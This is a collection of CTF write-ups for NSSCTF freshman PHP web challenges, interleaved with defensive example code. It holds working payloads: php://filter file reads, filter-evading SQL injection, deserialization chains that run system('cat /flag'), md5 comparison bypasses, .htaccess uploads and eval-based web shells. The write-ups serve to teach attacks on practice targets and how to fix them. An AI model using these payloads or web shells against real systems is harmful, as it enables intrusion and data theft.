Table of Contents
ez_ez_php
ez_ez_php(revenge)
Wonderful MD5
1z_unserialize
numgame
where_am_i
ez_ez_unserialize
js_sign
xff
webdog1__start
ez_sql
funny_php
funny_web
ez_1zpop
Ez_upload
file_master
Power!
ez_ez_php
source code:
<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (substr($_GET["file"], 0, 3) === "php") {
        echo "Nice!!!";
        include($_GET["file"]);
    } else {
        echo "Hacker!!";
    }
} else {
    highlight_file(__FILE__);
}
//flag.php
The parameter goes straight into include(), the only restriction being that its first 3 characters must be php.
So use the php:// pseudo-protocol directly:
?file=php://filter/convert.base64-encode/resource=flag.php
payload:
?file=php://filter/read=convert.base64-encode/resource=flag
Base64-decode the output to get the flag.
ez_ez_php(revenge)
source code:
<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (substr($_GET["file"], 0, 3) === "php") {
        echo "Nice!!!";
        include($_GET["file"]);
    } else {
        echo "Hacker!!";
    }
} else {
    highlight_file(__FILE__);
}
//flag.php
payload:
?file=php://filter/convert.base64-encode/resource=/flag
Base64-decode the output to get the flag.
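As an added defensive counterpart to ez_ez_php and ez_ez_php(revenge) (example code, not the challenge's): the include() above accepts any string that starts with php, which is exactly what php://filter does. The version below resolves a short page key against a fixed allowlist inside one directory; the page names, the pages/ directory and the 404 handling are assumptions.

```php
<?php
// Added example, not the challenge's code. The challenge's include() runs any
// string that starts with "php", so php://filter can read flag.php back
// base64-encoded. Here no user-controlled text ever reaches include(): the
// request only selects a key from a fixed map inside one directory.
declare(strict_types=1);

const PAGES = ['home' => 'home.php', 'about' => 'about.php'];   // assumed allowlist

function resolvePage(string $key, string $baseDir): ?string
{
    if (!isset(PAGES[$key])) {
        return null;                       // unknown key: nothing is included
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . PAGES[$key]);
    // realpath() returns false for missing files and for stream wrappers such
    // as php://filter; the prefix check keeps symlinked files inside $baseDir.
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Request handling (assumed layout: the includable pages live in ./pages/).
$key  = $_GET['file'] ?? '';
$page = is_string($key) ? resolvePage($key, __DIR__ . '/pages') : null;
if ($page === null) {
    http_response_code(404);
    exit('unknown page');
}
include $page;
```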
Wonderful MD5
ffifdyop
Its md5 digest is 276f722736c95d99e921722cf9ed621c.
Read as raw bytes, that digest begins with 'or'6 (the remaining bytes are unprintable).
Used in:
select * from admin where password=''or'6...'
This is equivalent to select * from admin where password='' or 1, which is the SQL injection.
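An added example (not from the write-up) of why the raw-digest query above is exploitable and how a parameterised query removes the problem; the table and column names follow the query quoted above, and the PDO connection is assumed.

```php
<?php
// Added example, not the challenge's code: the raw md5 digest of "ffifdyop"
// carries two quote bytes, and the query above splices it in unescaped.
declare(strict_types=1);

// First five bytes of md5("ffifdyop", raw) are 27 6f 72 27 36  ==  'or'6
function rawDigestPrefix(string $pw, int $n = 5): string
{
    return substr(md5($pw, true), 0, $n);
}

// The shape of the vulnerable query: the digest's first quote closes the
// empty literal, "or" follows, and '6...' opens a literal that is non-zero
// (hence true) in a numeric context, so every row of admin matches.
function vulnerableQuery(string $pw): string
{
    return "select * from admin where password='" . md5($pw, true) . "'";
}

// Fix: bind the digest as a parameter; bytes in data can never become syntax.
// (Unsalted md5 for passwords is itself weak; password_hash() is the real answer.)
function safeLookup(PDO $db, string $pw): array
{
    $stmt = $db->prepare('select * from admin where password = :pw');
    $stmt->execute([':pw' => md5($pw, true)]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Byte-level self-checks (no database needed):
assert(bin2hex(md5('ffifdyop', true)) === '276f722736c95d99e921722cf9ed621c');
assert(rawDigestPrefix('ffifdyop') === "'or'6");
assert(strpos(vulnerableQuery('ffifdyop'), "select * from admin where password=''or'6") === 0);
```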
Check out the source code
md5 bypass
payload:
?x=240610708&y=QLTHNDT
Visit f1na11y.php
Or bypass directly with arrays:
wqh[]=1&dsy[]=2
1z_unserialize
source code:
<?php
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
    function __destruct()
    {
        $a = $this->lt;
        $a($this->lly);
    }
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
?>
This is the key to the challenge.
Once the payload reaches unserialize(), __destruct runs $a($this->lly): with lt set to system and lly set to ls or cat, it is a plain command injection.
payload:
<?php
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
}
$a = new lyh();
$a->lt = 'system';
$a->lly = 'ls /';
echo serialize($a);
?>
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:4:"ls /";}
The next step is simply cat /flag:
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
numgame
Open the developer tools from the settings.
Just go into the settings and disable JavaScript.
The flag is in the JS file.
Base64-decode it.
The goal is to pass a parameter p via GET so that call_user_func() invokes the static method ctf of class nss.
if (preg_match("/n|c/m", $_GET['p'], $matches))
This blocks the letters n and c (the /m modifier is just multi-line mode).
call_user_func($_GET['p']); calls the function named by p.
A useful point here:
A static method can be called through the string NSS::CTF, and in PHP neither class names nor method names are case-sensitive.
So we can change the case to bypass the filter.
And because of hint2.php,
the payload is:
?p=Nss2::Ctf
where_am_i
guess phone number
Just search for pictures
02886112888
ez_ez_unserialize
source code:
<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}
payload:
<?php
class X
{
    public $x = 'fllllllag.php';
}
$a = new X;
echo serialize($a);
?>
O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
__wakeup also has to be bypassed, since it resets x to __FILE__.
So change the declared property count to 2:
?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
js_sign
Look at the source code.
There is some JS.
This should be the key to the challenge.
An online tool is used here:
CTF online tool – online tap code | tap code encoding | tap code algorithm | tap code (hiencode.com)
Decode it (with spaces between the pairs):
3343431344215434452124331421311122125444113513341415
This gives the flag:
NSSCTF{youfindflagbytapcode}
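An added decoder for the tap code used in js_sign (example code, not from the write-up); it assumes the standard 5x5 square with K folded into C.

```php
<?php
// Added example, not from the write-up: a decoder for the tap code in js_sign.
// Tap code is a 5x5 Polybius square with K folded into C; each pair of digits
// is (row, column), both counted from 1, e.g. 33 -> N, 43 -> S.
declare(strict_types=1);

const TAP_SQUARE = ['ABCDE', 'FGHIJ', 'LMNOP', 'QRSTU', 'VWXYZ'];

function tapDecode(string $taps): string
{
    $digits = preg_replace('/\D+/', '', $taps) ?? '';   // drop spaces and separators
    if ($digits === '') {
        return '';
    }
    if (strlen($digits) % 2 !== 0) {
        throw new InvalidArgumentException('odd number of digits');
    }
    $out = '';
    foreach (str_split($digits, 2) as $pair) {
        $row = (int) $pair[0];
        $col = (int) $pair[1];
        if ($row < 1 || $row > 5 || $col < 1 || $col > 5) {
            throw new InvalidArgumentException("invalid pair $pair");
        }
        $out .= TAP_SQUARE[$row - 1][$col - 1];
    }
    return $out;
}

// The challenge's digit string, copied from the page:
const CIPHER = '3343431344215434452124331421311122125444113513341415';

assert(tapDecode(CIPHER) === 'NSSCTFYOUFINDFLAGBYTAPCODE');
assert(tapDecode('33 43 43') === 'NSS');    // spaces between pairs are fine
echo tapDecode(CIPHER), "\n";               // NSSCTFYOUFINDFLAGBYTAPCODE
```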
xff
webdog1__start
The usual md5 bypass is to pass a value whose md5 starts with 0e. In a loose (weak) comparison PHP reads a numeric-looking string as a number, stopping at the first character that cannot be part of one; for a string of the form 0e followed only by digits that number is 0, so any two such strings compare equal. Here the submitted value must not only match $md5 but also equal its own md5, so we need a value that starts with 0e and whose md5 also starts with 0e, for example 0e215962017. Plain strings whose md5 has the 0e form include QNKCDZO and s878926199a.
?web=0e215962017
View the source code.
The "bot" hint means robots.txt. In later challenges you will occasionally run into a robots.txt that leaks a hint like this.
It shows up garbled at first; just fix the text encoding (in Firefox the option can be added from the customise-toolbar menu).
It's quite well hidden.
Here strstr() filters spaces,
and str_ireplace() replaces flag with a space.
payload:
?get=system(ls);
The same with the space replaced by a tab character:
?get=system("cat /f*");
ez_sql
"A relatively safe way to pass parameters": this should mean POST.
Try passing a:
Things shouldn't be that simple.
By trying, we learn that spaces and or are filtered.
Spaces can be replaced with /**/, and filtered keywords can be double-written.
nss=1'/**/oorrder/**/by/**/4#
order by 4 fails, so the query has 3 columns.
Dump the database name (union is double-written the same way):
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/database()),0x7e),1)#
Dump the table names (the or inside information_schema is filtered too, so it is double-written as well):
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db'),0x7e),1)#
Dump the columns of NSS_tb:
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'),0x7e),1)#
Dump the flag:
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(flll444g)/**/from/**/NSS_tb),0x7e),1)#
This one is obviously fake.
Dump Secr3t instead:
nss=0'/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t)/**/from/**/NSS_tb),3#
funny_php
source code:
<?php
session_start();
highlight_file(__FILE__);
if(isset($_GET['num'])){
    if(strlen($_GET['num'])<=3&&$_GET['num']>999999999){
        echo ":D";
        $_SESSION['L1'] = 1;
    }else{
        echo ":C";
    }
}
if(isset($_GET['str'])){
    $str = preg_replace('/NSSCTF/',"",$_GET['str']);
    if($str === "NSSCTF"){
        echo "wow";
        $_SESSION['L2'] = 1;
    }else{
        echo $str;
    }
}
if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){
    if($_POST['md5_1']!==$_POST['md5_2']&&md5($_POST['md5_1'])==md5($_POST['md5_2'])){
        echo "Nice!";
        if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){
            if(is_string($_POST['md5_1'])&&is_string($_POST['md5_2'])){
                echo "yoxi!";
                $_SESSION['L3'] = 1;
            }else{
                echo "X(";
            }
        }
    }else{
        echo "G";
        echo $_POST['md5_1']."\\ ".$_POST['md5_2'];
    }
}
if(isset($_SESSION['L1'])&&isset($_SESSION['L2'])&&isset($_SESSION['L3'])){
    include('flag.php');
    echo $flag;
}
?>
Let's go through it step by step.
Step 1
if(isset($_GET['num'])){
    if(strlen($_GET['num'])<=3&&$_GET['num']>999999999){
        echo ":D";
        $_SESSION['L1'] = 1;
    }else{
        echo ":C";
    }
}
num must have length at most 3 yet be greater than 999999999, which immediately suggests passing 1e9.
So payload:
?num=1e9
Step 2
if(isset($_GET['str'])){
    $str = preg_replace('/NSSCTF/',"",$_GET['str']);
    if($str === "NSSCTF"){
        echo "wow";
        $_SESSION['L2'] = 1;
    }else{
        echo $str;
    }
}
This removes every NSSCTF from the string we pass in (a single pass), so double writing is enough to bypass it.
?str=NSSNSSCTFCTF
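An added example (not the challenge's code) of why the double-writing trick works against a remove-once filter, covering both the ez_sql filter above (ununionion, oorrder) and funny_php step 2 (NSSNSSCTFCTF); the banned-word list is an assumed reconstruction, since the page only observes the filter's behaviour.

```php
<?php
// Added example, not the challenge's code: why "double writing" beats a
// remove-once filter, as used in ez_sql (ununionion, oorrder) and in funny_php
// step 2 (NSSNSSCTFCTF). The word list below is an assumed reconstruction;
// the write-up only observes the filter's behaviour, not its source.
declare(strict_types=1);

const BANNED = ['union', 'or', ' '];

// One removal pass: deleting the inner copy reassembles the outer one.
function stripOnce(string $in): string
{
    return str_ireplace(BANNED, '', $in);
}

// Removing until nothing changes closes that particular hole (the string
// shrinks every round, so the loop terminates) ...
function stripUntilStable(string $in): string
{
    do {
        $before = $in;
        $in = str_ireplace(BANNED, '', $in);
    } while ($in !== $before);
    return $in;
}
// ... but it is still a blacklist: /**/ stands in for the space, and any
// keyword or encoding not on the list passes. Input that reaches SQL has to
// be bound as a query parameter, not cleaned.

assert(stripOnce('ununionion') === 'union');
assert(stripOnce('oorrder') === 'order');
assert(stripUntilStable('ununionion') === '');
assert(stripUntilStable('oorrder') === 'der');
assert(stripUntilStable("1'/**/1=1#") === "1'/**/1=1#");           // comment survives
assert(preg_replace('/NSSCTF/', '', 'NSSNSSCTFCTF') === 'NSSCTF'); // funny_php step 2
```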
Step 3
if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){
    if($_POST['md5_1']!==$_POST['md5_2']&&md5($_POST['md5_1'])==md5($_POST['md5_2'])){
        echo "Nice!";
        if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){
            if(is_string($_POST['md5_1'])&&is_string($_POST['md5_2'])){
                echo "yoxi!";
                $_SESSION['L3'] = 1;
            }else{
                echo "X(";
            }
        }
    }else{
        echo "G";
        echo $_POST['md5_1']."\\ ".$_POST['md5_2'];
    }
}
Here the md5 weak comparison can be bypassed directly (the is_string() check rules out arrays, so two 0e strings are used):
md5_1=240610708&md5_2=QLTHNDT
So the payload is:
GET: ?num=1e9&str=NSSNSSCTFCTF
POST: md5_1=240610708&md5_2=QLTHNDT
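An added example (not the challenge's code) showing the PHP loose-comparison rules behind funny_php (1e9 and the md5 pair), Wonderful MD5 (the array bypass) and webdog1__start (0e strings), each next to the strict check that closes it; the md5 values in the comments are the well-known ones the page relies on.

```php
<?php
// Added example, not the challenge's code: the loose-comparison rules behind
// funny_php (1e9 and the md5 pair), Wonderful MD5 (the array bypass) and
// webdog1__start (0e strings), each next to the strict check that closes it.
declare(strict_types=1);

// "1e9" is three characters but, as a numeric string, compares as 1000000000.
function passesNumCheck(string $num): bool
{
    return strlen($num) <= 3 && $num > 999999999;
}
// Plain digits only, then an integer comparison: no 3-digit value can pass.
function passesNumCheckStrict(string $num): bool
{
    return preg_match('/^[0-9]{1,3}$/', $num) === 1 && (int) $num > 999999999;
}

// md5("240610708") = "0e462097431906509019562988736854"
// md5("QLTHNDT")   = "0e405967825401955372549139051580"
// Both parse as 0 x 10^n, so == sees two equal floats; hash_equals() (like ===)
// compares the 32 characters themselves.
function md5Loose(string $a, string $b): bool  { return md5($a) == md5($b); }
function md5Strict(string $a, string $b): bool { return hash_equals(md5($a), md5($b)); }

// webdog1 compares a value with its own md5: "0e215962017" hashes to
// "0e291242476940776845150308577824", and both are "zero" under ==.
function selfMd5Loose(string $v): bool  { return $v == md5($v); }
function selfMd5Strict(string $v): bool { return hash_equals(md5($v), $v); }

// Array bypass (wqh[]=1&dsy[]=2): in PHP 7 md5() of an array returns null with
// a warning, so null == null; PHP 8 throws a TypeError instead. Either way,
// check is_string() first, exactly as funny_php's third step does.
function sameMd5($x, $y): bool
{
    return is_string($x) && is_string($y) && hash_equals(md5($x), md5($y));
}

assert(passesNumCheck('1e9') && !passesNumCheckStrict('1e9'));
assert(md5Loose('240610708', 'QLTHNDT') && !md5Strict('240610708', 'QLTHNDT'));
assert(selfMd5Loose('0e215962017') && !selfMd5Strict('0e215962017'));
assert(!sameMd5(['1'], ['2']) && sameMd5('abc', 'abc'));
```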
funny_web
Account: NSS
Password: 2122693401
payload:
?num=12345a
ez_1zpop
source code:
<?php
error_reporting(0);
class dxg
{
    function fmm()
    {
        return "nonono";
    }
}
class lt
{
    public $impo = 'hi';
    public $md51 = 'weclome';
    public $md52 = 'to NSS';
    function __construct()
    {
        $this->impo = new dxg;
    }
    function __wakeup()
    {
        $this->impo = new dxg;
        return $this->impo->fmm();
    }
    function __toString()
    {
        if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
            return $this->impo->fmm();
    }
    function __destruct()
    {
        echo $this;
    }
}
class fin
{
    public $a;
    public $url = 'https://www.ctfer.vip';
    public $title;
    function fmm()
    {
        $b = $this->a;
        $b($this->title);
    }
}
if (isset($_GET['NSS'])) {
    $Data = unserialize($_GET['NSS']);
} else {
    highlight_file(__file__);
}
fin object
In fmm(), $b takes the value of a and is then called with title as its argument, so if a is 'system' the call becomes system(title).
title then carries the command we want.
So, for example, system('ls') corresponds to a='system', title='ls'.
lt object
Deserialization triggers __wakeup and __destruct. In __wakeup, impo is replaced with a fresh dxg object and returned, so nothing useful can be obtained from it. Bypassing __wakeup is simple: increase the declared number of properties in the serialized string, for example O:3:"fin":3:{s:1:"a";N;s:3:"url";N;s:5:"title";N;} => O:3:"fin":4:{s:1:"a";N;s:3:"url";N;s:5:"title";N;}
Triggering __destruct is also simple: it echoes the object itself, which calls __toString, which returns impo->fmm().
payload:
<?php
class lt
{
    public $impo;
    public $md51 = '240610708';
    public $md52 = 'QLTHNDT';
}
class fin
{
    public $a = 'system';
    public $ur = '111';
    public $title = 'ls /';
}
$aa = new lt();
$aa->impo = new fin();
echo serialize($aa);
?>
Raise the property count of lt here to bypass __wakeup:
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:2:"ur";s:3:"111";s:5:"title";s:4:"ls /";}s:4:"md51";s:9:"240610708";s:4:"md52";s:7:"QLTHNDT";}
Read the flag:
payload:
<?php
class lt
{
    public $impo;
    public $md51 = '240610708';
    public $md52 = 'QLTHNDT';
}
class fin
{
    public $a = 'system';
    public $ur = '111';
    public $title = 'cat /flag';
}
$aa = new lt();
$aa->impo = new fin();
echo serialize($aa);
?>
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:2:"ur";s:3:"111";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:9:"240610708";s:4:"md52";s:7:"QLTHNDT";}
Ez_upload
File upload.
Upload a .htaccess file:
<FilesMatch "mochu">
    SetHandler application/x-httpd-php
</FilesMatch>
Modify the Content-Type.
Upload shell.mochu:
<script language="php">@eval($_POST['1']);</script>
Then just access shell.mochu.
file_master
First create a.php and write:
GIF89a <?=eval($_POST['1']);?>
Upload it.
Modify the Content-Type.
We find that height and width are checked.
Change GIF89a to #define height 1 #define width 1
AntSword connects, but I can't access the flag; I don't know why.
I'll look at what other masters wrote later.
#define height 1
#define width 1
<?=`nl /f*`;?>
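An added example (not the challenge's code, PHP 8) of an upload handler written against the tricks used in Ez_upload and file_master: the client's Content-Type, the original name and getimagesize() are never trusted (the #define width/height header above is an XBM image header that getimagesize() accepts although the file is plain text); the form field name and storage directory are assumptions.

```php
<?php
// Added example, not the challenge's code: an upload handler written against
// the tricks in Ez_upload and file_master. Every decision comes from the file
// bytes plus a fixed extension map, never from the client's Content-Type, the
// original file name, or getimagesize() alone (an XBM header such as
// "#define width 1 #define height 1" satisfies getimagesize() but is plain text).
declare(strict_types=1);

const ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

function storeUpload(array $file, string $dir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // 1. Sniff the type from content with finfo; $_FILES['type'] is ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset(ALLOWED[$mime])) {
        return null;      // .htaccess, shell.mochu, .php, XBM text: all rejected here
    }
    // 2. Re-encode through GD: a "GIF89a<?=...?>" polyglot is decoded as pixels
    //    and written back without the original bytes, so the PHP tail is gone.
    $img = imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        return null;
    }
    // 3. Server-chosen random name and extension. $dir is assumed to be served
    //    as static files, with PHP handlers off and AllowOverride None so that
    //    an uploaded .htaccess could not remap handlers even if it got through.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;
    $ok = match (ALLOWED[$mime]) {
        'png' => imagepng($img, $dest),
        'jpg' => imagejpeg($img, $dest),
        'gif' => imagegif($img, $dest),
    };
    imagedestroy($img);
    return $ok ? $name : null;
}

// Usage (assumed form field "upload" and a storage directory outside the web root):
// $saved = storeUpload($_FILES['upload'] ?? [], __DIR__ . '/../uploads');
```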
Power!
Take a look at the source.
Blindly guess a GET parameter named source that reveals the source code.
Source code:
<?php
class FileViewer{
    public $black_list = "flag";
    public $local = "http://127.0.0.1/";
    public $path;
    public function __call($f,$a){
        $this->loadfile();
    }
    public function loadfile(){
        if(!is_array($this->path)){
            if(preg_match("/".$this->black_list."/i",$this->path)){
                $file = $this->curl($this->local."cheems.jpg");
            }else{
                $file = $this->curl($this->local.$this->path);
            }
        }else{
            $file = $this->curl($this->local."cheems.jpg");
        }
        echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';
    }
    public function curl($path){
        $url = $path;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        $response = curl_exec($curl);
        curl_close($curl);
        return $response;
    }
    public function __wakeup(){
        $this->local = "http://127.0.0.1/";
    }
}
class Backdoor{
    public $a;
    public $b;
    public $superhacker = "hacker.jpg";
    public function goodman($i,$j){
        $i->$j = $this->superhacker;
    }
    public function __destruct(){
        $this->goodman($this->a,$this->b);
        $this->a->c();
    }
}
if(isset($_GET['source'])){
    highlight_file(__FILE__);
}else{
    if(isset($_GET['image_path'])){
        $path = $_GET['image_path'];
        //flag in /flag.php
        if(is_string($path)&&!preg_match("/http:|gopher:|glob:|php:/i",$path)){
            echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
        }else{
            echo '<h2>Seriously</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>';
        }
    }else if(isset($_GET['path_info'])){
        $path_info = $_GET['path_info'];
        $FV = unserialize(base64_decode($path_info));
        $FV->loadfile();
    }else{
        $path = "vergil.jpg";
        echo '<h2>POWER!!</h2> <img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
    }
}
?>
I didn't quite understand it.
See the expert's write-up here:
NSS[SWPUTF 2022 Freshman Competition]ez_sql + funny_php + js_sign + funny_web + Power! – bilibili (bilibili.com)
<?php
class FileViewer{
    public $black_list = "The blacklist has nothing to do with me";
    public $local;
    public $path = "flag.php";
}
class Backdoor{
    public $a;
    public $b;
    public $superhacker = "127.0.0.1:65500/";
}
$m = new FileViewer;
$n = new Backdoor;
$n->a = $m;
$n->b = "local";
$m->local = $n;
echo base64_encode(serialize($m));
?>
payload:
?path_info=TzoxMDoiRmlsZVZpZXdlciI6Mzp7czoxMDoiYmxhY2tfbGlzdCI7czozMDoi6buR5ZCN5Y2V5LuA5LmI55qE566h5LiN552A5oiRIjtzOjU6ImxvY2FsIjtPOjg6IkJhY2tkb29y IjozOntzOjE6ImEiO3I6MTtzOjE6ImIiO3M6NToibG9jYWwiO3M6MTE6InN1cGVyaGFja2VyIjtzOjE2OiIxMjcuMC4wLjE6NjU1MDAvIjt9czo0OiJwYXRoIjtzOjg6ImZsYWcucGhwIjt9
Base64-decode the returned image data.
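An added example (not the challenge's code) of the defensive side of the four deserialization challenges above (1z_unserialize, ez_ez_unserialize, ez_1zpop, Power!): with allowed_classes => false, unserialize() never instantiates the gadget classes, so none of their magic methods run. The lyh class is copied from 1z_unserialize; the payload is constructed with var_dump in place of system.

```php
<?php
// Added example, not the challenge's code. 1z_unserialize, ez_ez_unserialize,
// ez_1zpop and Power! all need unserialize() to instantiate a class whose
// __wakeup, __destruct, __toString or __call then runs. With
// allowed_classes => false every object is an __PHP_Incomplete_Class instead,
// and none of those magic methods is ever invoked.
declare(strict_types=1);
class lyh                        // the 1z_unserialize gadget, unchanged
{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
    public function __destruct()
    {
        $a = $this->lt;
        $a($this->lly);
    }
}
// Constructed payload in the write-up's shape, with var_dump in place of system.
const PAYLOAD = 'O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:8:"var_dump";s:3:"lly";s:5:"hello";}';

function unsafeLoad(string $data): string
{
    $o = unserialize($data);     // a real lyh: __destruct runs var_dump('hello') on return
    return get_class($o);
}
function safeLoad(string $data): string
{
    $o = unserialize($data, ['allowed_classes' => false]);
    return get_class($o);        // "__PHP_Incomplete_Class": nothing runs
}
// Power! calls $FV->loadfile() on whatever came out of unserialize(); on an
// incomplete object that raises an Error instead of entering user code.
function callOnIncomplete(string $data): string
{
    $o = unserialize($data, ['allowed_classes' => false]);
    try {
        $o->loadfile();
        return 'called';
    } catch (Error $e) {
        return 'blocked';
    }
}
// The property-count trick used above to skip __wakeup while still getting
// __destruct only works before the fix for CVE-2016-7124 (PHP 5.6.25 / 7.0.10).
assert(unsafeLoad(PAYLOAD) === 'lyh');
assert(safeLoad(PAYLOAD) === '__PHP_Incomplete_Class');
assert(callOnIncomplete(PAYLOAD) === 'blocked');
```

For input that must carry structured data from a client, exchanging JSON (json_decode with assoc = true) avoids unserialize() altogether.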